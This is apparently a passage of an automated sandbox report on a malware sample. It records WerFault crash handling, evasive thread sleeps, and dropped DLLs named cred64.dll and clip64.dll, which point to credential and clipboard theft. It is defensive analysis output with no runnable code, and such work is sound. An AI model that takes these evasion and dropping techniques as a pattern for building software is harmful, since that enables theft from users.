Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe API coverage: 3.1 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 1.6 %
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe API coverage: 8.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7656 Thread sleep time: -1920000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7716 Thread sleep time: -900000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7708 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe TID: 7656 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00408180 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo, 0_2_00408180
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_e07fb967fe61390ff947874da9a18efae6cac7_8e61c4a5_95ca67f7-278d-440f-920c-862f52c2b333\
Source: C:\Windows\SysWOW64\WerFault.exe File opened: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_c92ec1cea5a09af2_f9165ae4ce682ce742d9caa30eddae375d89b91_8e61c4a5_199673d7-74d3-4533-ae8f-04d3f7d3cc65\
